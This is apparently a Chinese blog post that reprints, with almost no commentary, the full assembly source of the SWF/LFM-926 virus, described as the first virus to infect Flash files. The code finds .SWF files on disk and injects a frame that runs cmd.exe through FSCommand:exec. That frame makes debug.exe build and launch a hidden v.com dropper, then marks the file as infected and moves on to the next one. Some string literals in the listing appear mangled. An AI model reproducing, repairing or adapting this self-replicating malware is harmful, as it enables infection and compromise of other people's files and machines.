第一只感染flash的病毒源代码

Jonty
2013-03-01 / 0 评论 / 97 阅读 / 正在检测是否收录...

代码如下:

SWF/LFM-926 Virus: 
; ------------------ 
; Description: WinNT/XP Virus dropper for Flash .SWF files! 
; Masm Version 6.11: ML.EXE SWF.ASM 
; Virus Size: 926 bytes 
; Infection Size: 3247 bytes. 
; Last Edit: 01/08/2002 
; --------------------------------- Begin Source Code ------------------------------------ 

.286 
.model tiny 
.code 
org 100h Entry: jmp Start 
VIR_SIZE equ Virus_End-Entry 
DTA db 128 dup(0) ; Offset DTA+30 = filename 
HANDLE dw ? ; Handle to host file 
PTR1 dd 0 ; Segment address of the created memory block 
PATH db "*.SWF",0 ; File mask 
BINARY db "v.com",0 ; Binary code 
HEX db "0123456789ABCDEF" ; Binary to hex 
; Flash header block. 
; ------------------- 
SIGN_FW dw ? ; SWF file format 
SIGN_S db ? 
VERSION_NUM db ? 
FILE_LENGTH dw ? 
dw ? 
STATIC_HDR_SIZE equ $-SIGN_FW 
RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isnt static. ;( 
RECT_BUF_SIZE equ $-RECT_BUF 
HDR_SIZE dw ? ; Holds the true header size! 
; Start of Viral Frame 0. 
; ----------------------- 
Drop_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes! 
TAG_LENGTH dw 0 ; (ACTION LENGTH+3)+1[END_TAG] 
dw 0 
db 083h ; ActionGetUrl Tag 
ACTION_LENGTH dw 0 ; (Drop_BEGIN_SIZE-9)+(SUM OF Drop_MIDDLE)+(Drop_END_SIZE) 
db FSCommand:exec 
db 000h 
db cmd.exe 
db 009h ; chr(9) is Flash code for a space character. 
db /c 
db 009h 
db echo 
db 009h 
db Loading.Flash.Movie... 
db & 
db (echo 
db 009h 
db n 
db 009h 
db v.com&echo 
db 009h 
db a 
db 009h 
db 100& 
Drop_BEGIN_SIZE equ $-Drop_BEGIN 
Drop_MIDDLE db echo 
db 009h 
db db 
db 009h 
db 71 dup(,) ; db XX,...,XX where XXs are viral hex codes. 
db & 
Drop_MIDDLE_SIZE equ $-Drop_MIDDLE 
Drop_END db &echo.&echo 
db 009h 
db rcx&echo 
db 009h 
db 39E ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes. 
db &echo 
db 009h 
db w&echo 
db 009h 
db q)|debug.exe>nul&start 
db 009h 
db /b 
db 009h 
db v.com 
db 000h ; StringEnd Tag 
Drop_END_SIZE equ $-Drop_END 
; End of Viral Frame 0. 
; --------------------- 
END_TAG db 001h ; Action code 0x01 = tagshowframe Tag 
Start: 
mov ax,(VIR_SIZE+0fh) 
shr ax,4 
shl ax,1 
mov bx,ax ; Allocate (VirusSize*2) 
mov ah,4ah 
int 21h ; Resize block 
jc ExProg 
mov dx,offset DTA ; Set DTA operation 
mov ah,1ah 
int 21h 
mov cx,07h 
mov dx,offset PATH 
mov ah,4eh ; FindFirst 
int 21h 
jc ExProg 
jmp Infect 
Cycle: 
mov dx,offset PATH 
mov ah,4fh ; FindNext 
int 21h 
jc ExProg 
jmp Infect 
ExProg: 
mov ax,4301h ; Hide v.com 
mov cx,02h 
mov dx,offset BINARY 
int 21h 
mov ax,4c00h ; End program 
int 21h 
Infect: 
mov byte ptr DTA[30+12],$ 
mov dx,offset (DTA+30) 
mov ax,3d02h ; Open host file 
int 21h 
jc ExProg 
mov [HANDLE],ax ; Save file handle 
mov ax,3f00h ; Read file Header 
mov dx,offset SIGN_FW 
mov bx,[HANDLE] 
mov cx,(STATIC_HDR_SIZE+RECT_BUF_SIZE) 
int 21h 
jc ExProg 
cmp word ptr SIGN_FW,WF ; Check for a valid Flash SWF file. 
jne Cycle ; Try another file ... 
cmp byte ptr SIGN_S,S 
jne Cycle 
cmp byte ptr VERSION_NUM,099h ; Already infected? 
je Cycle 
mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag. 
xor di,di ; Seems to always exist directly after the header. 
next: cmp byte ptr RECT_BUF[di],043h 
jne not_found 
cmp byte ptr RECT_BUF[di+1],002h 
jne not_found 
jmp found 
not_found: 
inc di 
loop next 
jmp Cycle 
found: 
mov word ptr HDR_SIZE,STATIC_HDR_SIZE 
add word ptr HDR_SIZE,di ; Compute the header size 
mov ax,4200h ; Reset file ptr right after Flash header 
xor cx,cx 
mov dx,[HDR_SIZE] 
int 21h 
jc ExProg 
push bx 
mov ax,word ptr FILE_LENGTH 
add ax,15 
shr ax,4 
mov bx,ax 
mov ah,48h ; Allocate memory for target host file 
int 21h 
pop bx 
jc ExProg 
mov word ptr PTR1[2],ax ; Save pointer to allocated block 
mov cx,word ptr FILE_LENGTH 
sub cx,[HDR_SIZE] 
mov ah,3fh ; Read host file into memory block 
push ds 
lds dx,[PTR1] 
int 21h 
pop ds 
jc ExProg 
mov ax,4200h ; Reset file ptr to the middle code section 
xor cx,cx 
mov dx,[HDR_SIZE] 
add dx,Drop_BEGIN_SIZE 
int 21h 
jc ExProg 
; 
; The following code is a key technique. It simply converts the 
; virus from binary to hex characters and then inserts them into the host 
; using a standard format that DEBUG.EXE expects! Flash only really 
; allows plain text, so this satisfies that condition. 
; 
mov word ptr ACTION_LENGTH,(Drop_BEGIN_SIZE-9+Drop_END_SIZE) 
push bx 
mov cx,VIR_SIZE 
xor si,si 
xor di,di 
ToHex: 
mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex humber 
mov al,byte ptr Entry[si] 
mov ah,al 
and al,00001111y 
xlat 
mov Drop_MIDDLE[STATIC_HDR_SIZE+di+1],al 
shr ax,12 
xlat 
mov Drop_MIDDLE[STATIC_HDR_SIZE+di],al 
inc si 
inc di 
inc di 
inc di 
mov ax,si 
mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line. 
div bl 
or ah,ah 
jnz cont 
push cx 
xor di,di 
add word ptr ACTION_LENGTH,Drop_MIDDLE_SIZE 
mov bx,[HANDLE] ; Write hex dump entry XX,...,XX 
mov dx,offset Drop_MIDDLE 
mov cx,Drop_MIDDLE_SIZE 
mov ax,4000h 
int 21h 
jc ExProg 
pop cx 
cont: 
loop ToHex 
pop bx 
or di,di 
jz no_remainder 
mov dx,offset Drop_MIDDLE 
mov cx,di 
add cx,7 ; STATIC_HDR_SIZE-1 
add word ptr ACTION_LENGTH,cx 
mov ax,4000h ; Write remainder hex dump entry XX,...,XX 
int 21h 
jc ExProg 
no_remainder: 
mov dx,offset Drop_END 
mov cx,Drop_END_SIZE+1 
mov ax,4000h ; Write end code and end of frame tag(01) into host 
int 21h 
jc ExProg 
mov cx,word ptr FILE_LENGTH 
sub cx,[HDR_SIZE] 
mov ax,4000h ; Write host code directly after viral code. 
push ds 
lds dx,[PTR1] 
int 21h 
pop ds 
jc ExProg 
; Patch the header with new viral values. 
mov cx,word ptr ACTION_LENGTH 
add cx,4 
mov word ptr TAG_LENGTH,cx 
add cx,6 
add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH+6) 
; Set infection marker 
mov byte ptr VERSION_NUM,099h 
mov di,[HDR_SIZE] 
inc word ptr [SIGN_FW+di-2] ; Increase Frame count by 1 
mov ax,4200h ; Re-wind to start of file 
xor cx,cx 
xor dx,dx 
int 21h 
jc ExProg 
mov dx,offset SIGN_FW 
mov cx,[HDR_SIZE] 
mov ax,4000h ; Write updated viral header 
int 21h 
jc ExProg 
mov dx,offset Drop_BEGIN 
mov cx,Drop_BEGIN_SIZE 
mov ax,4000h ; Write begin code into host 
int 21h 
jc ExProg 
mov ah,49h ; Free memory block 
mov es,word ptr PTR1[2] 
int 21h 
jc ExProg 
mov ax,3e00h ; Close file 
int 21h 
jc ExProg 
jmp Cycle ; DONE! Try to infect another. 
Virus_End: 
end Entry
本文共 4 个字数,平均阅读时长 ≈ 1分钟
0

打赏

海报

正在生成.....

评论 (0)

取消